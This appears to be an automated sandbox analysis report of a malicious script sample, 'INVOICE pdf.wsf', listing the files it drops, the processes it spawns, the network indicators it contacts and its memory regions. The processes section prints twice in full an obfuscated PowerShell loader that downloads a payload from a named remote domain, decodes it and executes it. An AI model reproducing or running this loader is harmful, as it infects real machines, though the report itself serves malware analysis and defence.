Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
INVOICE pdf.wsf
|
XML 1.0 document, ASCII text, with very long lines (1969), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajpopih2.xll.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_llbsdq4o.vv3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pd5wkpoa.2hz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pedo13lo.ski.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Benzidine233.Sjl
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping %.%.%.%
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c dir
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5;
$Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function
Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/
Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote
restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo
S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy
s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it
avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc
riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera
DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders
'.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier
flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro
3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders
'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre
lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders
'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe
ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun
erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl
Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1
Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t
Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei
UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. SprtH.eisme Encya Defrd KnoceGelser
DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG
ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies
Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde
sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd
lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende
(Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o
In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb
D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders
'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu
T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp
Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen
htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro
mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende
(Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg
magllKnalloM,ldvbTicklaDesinlBollo:Cen rD temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia
oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende
(Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e
Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp
SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg
MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF
ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk
tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi
SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz
wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn
AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. DdsdGA tioeOver,tPaadmSHyatttM.norrC
arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape
');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn
oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys
Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei
');Udslyngende $Gelatinizing192;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5;
$Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function
Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/
Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote
restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo
S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy
s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it
avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc
riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera
DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders
'.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier
flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro
3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders
'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre
lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders
'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe
ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun
erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl
Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1
Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t
Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei
UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. SprtH.eisme Encya Defrd KnoceGelser
DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG
ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies
Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde
sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd
lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende
(Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o
In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb
D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders
'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu
T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp
Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen
htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro
mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende
(Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg
magllKnalloM,ldvbTicklaDesinlBollo:Cen rD temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia
oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende
(Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e
Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp
SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg
MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF
ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk
tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi
SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz
wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn
AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. DdsdGA tioeOver,tPaadmSHyatttM.norrC
arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape
');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn
oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys
Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei
');Udslyngende $Gelatinizing192;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbXR
|
unknown
|
||
|
http://originalconceptsinc.ru.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfb
|
216.10.249.248
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbP
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
originalconceptsinc.ru.com
|
216.10.249.248
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
216.10.249.248
|
originalconceptsinc.ru.com
|
India
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5EC7000
|
trusted library allocation
|
page read and write
|
|
|
|
2449A046000
|
trusted library allocation
|
page read and write
|
|
|
|
9D38000
|
direct allocation
|
page execute and read and write
|
|
|
|
8AF0000
|
direct allocation
|
page execute and read and write
|
|
|
|
21B9A853000
|
heap
|
page read and write
|
||
|
24488490000
|
heap
|
page read and write
|
||
|
309D000
|
heap
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
21B9A9C0000
|
heap
|
page read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
21B9A92F000
|
heap
|
page read and write
|
||
|
244883B0000
|
heap
|
page read and write
|
||
|
21B989B6000
|
heap
|
page read and write
|
||
|
2448B88B000
|
trusted library allocation
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
7669000
|
heap
|
page read and write
|
||
|
21B9AD21000
|
heap
|
page read and write
|
||
|
244A24D1000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
8B20000
|
direct allocation
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B989E0000
|
heap
|
page read and write
|
||
|
21B9A93B000
|
heap
|
page read and write
|
||
|
21B98BA9000
|
heap
|
page read and write
|
||
|
21B9AACD000
|
heap
|
page read and write
|
||
|
7EF30000
|
trusted library allocation
|
page execute and read and write
|
||
|
244883E5000
|
heap
|
page read and write
|
||
|
21B9AA46000
|
heap
|
page read and write
|
||
|
244884A6000
|
heap
|
page read and write
|
||
|
D7C70FF000
|
stack
|
page read and write
|
||
|
21B9AB60000
|
heap
|
page read and write
|
||
|
21B9A91D000
|
heap
|
page read and write
|
||
|
21B9AADF000
|
heap
|
page read and write
|
||
|
5C21000
|
trusted library allocation
|
page read and write
|
||
|
9AE71FE000
|
stack
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
21B9A8F9000
|
heap
|
page read and write
|
||
|
21B9AA99000
|
heap
|
page read and write
|
||
|
31E0000
|
trusted library allocation
|
page read and write
|
||
|
4A1E000
|
stack
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA7D000
|
heap
|
page read and write
|
||
|
D7C6FFF000
|
unkown
|
page read and write
|
||
|
21B9AAE3000
|
heap
|
page read and write
|
||
|
85F5000
|
trusted library allocation
|
page read and write
|
||
|
244A25F0000
|
heap
|
page read and write
|
||
|
21B9A861000
|
heap
|
page read and write
|
||
|
21B98BAB000
|
heap
|
page read and write
|
||
|
21B9A86A000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
21B9A920000
|
heap
|
page read and write
|
||
|
24488488000
|
heap
|
page read and write
|
||
|
1DBE7BC0000
|
heap
|
page read and write
|
||
|
31B0000
|
trusted library section
|
page read and write
|
||
|
4A5F000
|
stack
|
page read and write
|
||
|
21B9AA7A000
|
heap
|
page read and write
|
||
|
21B9A851000
|
heap
|
page read and write
|
||
|
21B989D8000
|
heap
|
page read and write
|
||
|
21B9AAE6000
|
heap
|
page read and write
|
||
|
21B989DA000
|
heap
|
page read and write
|
||
|
56DE543000
|
stack
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
7561000
|
heap
|
page read and write
|
||
|
244A2446000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page execute and read and write
|
||
|
21B9AB9B000
|
heap
|
page read and write
|
||
|
21B98982000
|
heap
|
page read and write
|
||
|
76FD000
|
heap
|
page read and write
|
||
|
21B9A9C0000
|
heap
|
page read and write
|
||
|
7375000
|
heap
|
page read and write
|
||
|
21B9AAC2000
|
heap
|
page read and write
|
||
|
24489DE3000
|
heap
|
page read and write
|
||
|
24489DD0000
|
heap
|
page read and write
|
||
|
24489FD1000
|
trusted library allocation
|
page read and write
|
||
|
5C39000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA5D000
|
heap
|
page read and write
|
||
|
244A2870000
|
heap
|
page read and write
|
||
|
244884D4000
|
heap
|
page read and write
|
||
|
21B9AACD000
|
heap
|
page read and write
|
||
|
21B9A919000
|
heap
|
page read and write
|
||
|
244A25E8000
|
heap
|
page read and write
|
||
|
21B9A92B000
|
heap
|
page read and write
|
||
|
21B9A948000
|
heap
|
page read and write
|
||
|
8853000
|
heap
|
page read and write
|
||
|
244A23E9000
|
heap
|
page read and write
|
||
|
2448A443000
|
trusted library allocation
|
page read and write
|
||
|
21B9AA52000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
56DD4FE000
|
stack
|
page read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
56DDBBB000
|
stack
|
page read and write
|
||
|
24489F40000
|
trusted library allocation
|
page read and write
|
||
|
21B9AAA6000
|
heap
|
page read and write
|
||
|
